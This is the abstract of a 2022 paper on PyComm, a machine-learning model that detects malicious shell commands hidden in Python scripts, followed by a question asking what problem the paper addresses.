PyComm: Malicious commands detection model for python scripts

Anmin Zhou,Tianyi Huang,Cheng Huang,Dunhan Li,Chuangchuang Song
DOI: https://doi.org/10.3233/jifs-211557
2022-02-02
Abstract:Python is a concise language which can be used to build lightweight tools or dynamic object-orientated applications. The various attributes of Python have made it attractive to numerous malware authors. Attackers often embed malicious shell commands into Python scripts for illegal operations. However, traditional static analysis methods are not feasible to detect this kind of attack because they focus on common features and failure in finding those malicious commands. On the other hand, dynamic analysis is not optimal in this case for its time-consuming and inefficient. In this paper, we propose PyComm, a model for detecting malicious commands in Python scripts with multidimensional features based on machine learning, which considers both 12 statistical features and string sequences of Python source code. Meanwhile, three comparison experiments are designed to evaluate the validity of proposed method. Experimental results show that presented model has achieved an excellent performance based on those practical features and random forest (RF) algorithm, obtained an accuracy of 0.955 with a recall of 0.943.
What problem does this paper attempt to address?